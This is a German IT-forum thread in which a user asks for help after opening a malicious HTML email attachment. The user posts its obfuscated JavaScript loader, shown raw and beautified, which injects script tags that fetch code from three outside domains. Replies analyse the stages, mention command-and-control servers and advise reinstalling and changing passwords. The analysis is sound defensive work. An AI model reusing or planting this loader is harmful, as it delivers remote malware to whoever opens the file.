HTML Javascript Schadcode?
Hallo Leute
wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.
Der Kaspersky hat nicht angeschlagen.
Weiß vielleicht jemand was ich mir da eingefangen habe?
wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.
<script type="text/javascript">
var a0gaxemmamnmai=a0auopbttselaeva;(function(paltvonousn,molssurosiumdpo){var aqsupimi=a0auopbttselaeva,lnpmaguiac=paltvonousn();while(!![]){try{var uaamumatquindlail=parseInt(aqsupimi(0xc8))/0x1*(parseInt(aqsupimi(0xc7))/0x2)+parseInt(aqsupimi(0xc3))/0x3+parseInt(aqsupimi(0xc1))/0x4+-parseInt(aqsupimi(0xc6))/0x5+-parseInt(aqsupimi(0xc4))/0x6+-parseInt(aqsupimi(0xbf))/0x7*(-parseInt(aqsupimi(0xc5))/0x8)+-parseInt(aqsupimi(0xcf))/0x9;if(uaamumatquindlail===molssurosiumdpo)break;else lnpmaguiac['push'](lnpmaguiac['shift']());}catch(sdasenectuear){lnpmaguiac['push'](lnpmaguiac['shift']());}}}(a0pcuisssitint,0x9c462));function a0auopbttselaeva(pcuisssitint,auopbttselaeva){var paltvonousn=a0pcuisssitint();return a0auopbttselaeva=function(molssurosiumdpo,lnpmaguiac){molssurosiumdpo=molssurosiumdpo-0xbd;var uaamumatquindlail=paltvonousn[molssurosiumdpo];return uaamumatquindlail;},a0auopbttselaeva(pcuisssitint,auopbttselaeva);}var voluptatemrerum=[a0gaxemmamnmai(0xc2)+'nseg.com/qu/qu'+a0gaxemmamnmai(0xcc),'https://ksaa-e'+a0gaxemmamnmai(0xbe)+a0gaxemmamnmai(0xbd)+'2',a0gaxemmamnmai(0xd1)+a0gaxemmamnmai(0xca)+a0gaxemmamnmai(0xcd)+a0gaxemmamnmai(0xc0)+'5111'];function a0pcuisssitint(){var tboeurldsoi=['osscommunicati','appendChild','.php?14652','onservices.com','script','8538543FFQfSE','createElement','https://youngb','/enqu.php?2954','vents.com/enqu','8781570gbVRZg','/aua/aua.php?3','4856144NrAgbj','https://horizo','387975mYIIKZ','2511780PInbUf','8XBKhBs','6018945WNxSPK','12146zVqPWt','101AYDIcr','src'];a0pcuisssitint=function(){return tboeurldsoi;};return a0pcuisssitint();}for(var occaecatiestnesciunt in voluptatemrerum){var rem=document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));rem[a0gaxemmamnmai(0xc9)]=voluptatemrerum[occaecatiestnesciunt],document['head'][a0gaxemmamnmai(0xcb)](rem);}
</script>
Der Kaspersky hat nicht angeschlagen.
Weiß vielleicht jemand was ich mir da eingefangen habe?
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 6465992526
Url: https://administrator.de/forum/html-javascript-schadcode-6465992526.html
Ausgedruckt am: 24.12.2024 um 18:12 Uhr
12 Kommentare
Neuester Kommentar
Hi,
Stage 1 läd ein Skript von 3 verschiedenen URLs nach, davon ist eine down.
Stage 2: https://pastebin.com/AriyCjZ1
Stage 2 scheint eine Datei abzuspeichern..
weiter komme ich heute nicht da ich meine Malware-Umgebung nicht dabei habe..
Stage 1 läd ein Skript von 3 verschiedenen URLs nach, davon ist eine down.
Stage 2: https://pastebin.com/AriyCjZ1
Stage 2 scheint eine Datei abzuspeichern..
weiter komme ich heute nicht da ich meine Malware-Umgebung nicht dabei habe..
Hier nach dem "Beautifier":
<script type = "text/javascript" >
var a0gaxemmamnmai = a0auopbttselaeva;
(function(paltvonousn, molssurosiumdpo) {
var aqsupimi = a0auopbttselaeva,
lnpmaguiac = paltvonousn();
while (!![]) {
try {
var uaamumatquindlail = parseInt(aqsupimi(0xc8)) / 0x1 * (parseInt(aqsupimi(0xc7)) / 0x2) + parseInt(aqsupimi(0xc3)) / 0x3 + parseInt(aqsupimi(0xc1)) / 0x4 + -parseInt(aqsupimi(0xc6)) / 0x5 + -parseInt(aqsupimi(0xc4)) / 0x6 + -parseInt(aqsupimi(0xbf)) / 0x7 * (-parseInt(aqsupimi(0xc5)) / 0x8) + -parseInt(aqsupimi(0xcf)) / 0x9;
if (uaamumatquindlail === molssurosiumdpo) break;
else lnpmaguiac['push'](lnpmaguiac['shift']());
} catch (sdasenectuear) {
lnpmaguiac['push'](lnpmaguiac['shift']());
}
}
}(a0pcuisssitint, 0x9c462));
function a0auopbttselaeva(pcuisssitint, auopbttselaeva) {
var paltvonousn = a0pcuisssitint();
return a0auopbttselaeva = function(molssurosiumdpo, lnpmaguiac) {
molssurosiumdpo = molssurosiumdpo - 0xbd;
var uaamumatquindlail = paltvonousn[molssurosiumdpo];
return uaamumatquindlail;
}, a0auopbttselaeva(pcuisssitint, auopbttselaeva);
}
var voluptatemrerum = [a0gaxemmamnmai(0xc2) + 'nseg.com/qu/qu' + a0gaxemmamnmai(0xcc), 'https://ksaa-e' + a0gaxemmamnmai(0xbe) + a0gaxemmamnmai(0xbd) + '2', a0gaxemmamnmai(0xd1) + a0gaxemmamnmai(0xca) + a0gaxemmamnmai(0xcd) + a0gaxemmamnmai(0xc0) + '5111'];
function a0pcuisssitint() {
var tboeurldsoi = ['osscommunicati', 'appendChild', '.php?14652', 'onservices.com', 'script', '8538543FFQfSE', 'createElement', 'https://youngb', '/enqu.php?2954', 'vents.com/enqu', '8781570gbVRZg', '/aua/aua.php?3', '4856144NrAgbj', 'https://horizo', '387975mYIIKZ', '2511780PInbUf', '8XBKhBs', '6018945WNxSPK', '12146zVqPWt', '101AYDIcr', 'src'];
a0pcuisssitint = function() {
return tboeurldsoi;
};
return a0pcuisssitint();
}
for (var occaecatiestnesciunt in voluptatemrerum) {
var rem = document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));
rem[a0gaxemmamnmai(0xc9)] = voluptatemrerum[occaecatiestnesciunt], document['head'][a0gaxemmamnmai(0xcb)](rem);
} < /script>
Zitat von @Fennek11:
Der dritte link wird von Kaspersky als "malicous" eingestuft.
https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary
Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
Der dritte link wird von Kaspersky als "malicous" eingestuft.
https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary
Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
Wenn du absolute Sicherheit willst, Alles platt machen, Windows neu installieren und Daten vom Backup wieder einspielen. Alles andere wäre als Vorschlag unseriös.
Zitat von @nullchecker:
Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Im Endeffekt kann das Teil alles machen. Über eine Remote-Shell die mit dem CC Server in Kontakt steht kannst du nachladen was du gerade brauchst.Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Platt machen und Kennwörter von den kritischsten Accounts sicherheitshalber ändern ist Pflichtprogramm bei unbekannten Infektionen.
Würde ich mich nicht drauf verlassen. Das wird oft über Windows-Prozesse getarnt.
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).
Gibt es unterschiedliche Vorgehensweisen, meistens kontaktiert der Client einen CC (Command & Control Server) in zeitlichen Abständen, welcher meistens verschlüsselte Anweisungen für den Client abgelegt hat und die der Client dann ausführt. Das kann sogar durch getarnte DNS-Abfragen geschehen so das es noch weniger auffällt, oder durch zur Laufzeit injizierte JavaScripts im Browser etc. pp.